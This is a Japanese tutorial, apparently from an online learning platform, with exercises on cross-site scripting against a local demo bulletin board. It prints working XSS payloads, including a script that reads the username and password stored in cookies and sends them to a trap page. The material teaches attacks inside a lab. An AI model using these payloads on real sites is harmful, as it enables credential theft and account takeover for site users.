演習課題「htmlをそのまま投稿する」
次のhtmlをbbsの投稿フォームで投稿し、htmlとして解釈されていることを確認してください。
<h1>Hack</h1>
※ユーザーeveのログインパスワードは123です。
演習課題「trapページへ遷移させるXSS」
ユーザーがログインすると、trapページに強制遷移させるように、サイトを改変するようにクロスサイトスクリプティングしてください。
ただし、スクリプトは以下を使用してください。
<script>window.location='trap.php'</script>
※ユーザーeveのログインパスワードは123です。
#05:クロスサイトスクリプティングで攻撃する
クロスサイトスクリプティング(XSS)でレッスン内のサイトを攻撃してみます。強制的に外部サイトへアクセスさせる不正なJavaScriptを掲示板サイトに埋め込んで、ユーザーの情報を盗み出します。
本レッスンの攻撃内容を外部のサイトにおこなうと犯罪になりますので、ご注意ください。
クロスサイトスクリプティング:
Webサイト側の意図しないスクリプトを何らかの方法でサイトに埋め込むことで、そのサイトの利用者のブラウザでスクリプトを実行させること
(具体例) 悪意のあるスクリプトによって、サイト内でユーザーが個人情報を表示するページを開いたときに、そのページの情報を第三者のサイトに送信する
このチャプターでは、悪意のある攻撃者の「eve」としてログインして、aliceのパスワードを盗み出します。
ユーザー名:eve
パスワード:123
Google Chromeの場合は、
「設定」→「詳細設定」→「サイトの設定」→「Cookie」→「すべてのCookieとサイトデータを表示」
の順に操作し、デモサイトのドメイン名(ブラウザのURIの「localhost-xxx.learning.paiza-user-learning.cloud」の部分)で検索します。
※paizaラーニングでは、デモサイトのドメインが毎回別のものになるので、画面の中のブラウザからコピーしてください
以下を入力すると、HTMLで指定したとおりの色・サイズで「文字」が出力されます。<span style="color: red; font-size: 80px;">文字</span>
以下を入力すると、アラートダイアログが表示されるようになります。<script>alert(document.cookie);</script>
※ためす際は、画面の中のブラウザの右上にある「新しいウインドウで開く」でウインドウを開いてください。
このチャプターで使用したスクリプトです。<script>window.location='trap.php?'+document.cookie.match(/(user_name=.+?);/)[1]+'&'+document.cookie.match(/(user_password=.+?);/)[1]</script>